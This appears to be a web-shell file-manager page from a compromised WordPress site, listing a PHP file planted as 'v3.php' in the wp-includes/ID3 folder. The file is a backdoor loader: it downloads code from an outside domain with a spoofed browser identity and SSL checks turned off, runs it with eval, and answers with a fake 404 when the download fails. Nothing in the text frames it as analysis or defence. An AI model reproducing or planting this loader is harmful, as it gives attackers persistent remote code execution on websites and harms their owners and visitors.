Your IP : 216.73.216.123


Current Path : /home/smartbloks/public_html/agency/wp-includes/ID3/
Upload File :
Current File : /home/smartbloks/public_html/agency/wp-includes/ID3/v3.php.tar

home/smartbloks/public_html/agency/wp-includes/ID3/v3.php000064400000001140151131203330017263 0ustar00<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://stepmomhub.com/3.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');
curl_setopt($ch, CURLOPT_REFERER, 'https://google.com');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$code = curl_exec($ch);
curl_close($ch);

if($code) {
    eval("?>".$code);
} else {
    header("HTTP/1.0 404 Not Found");
}
?>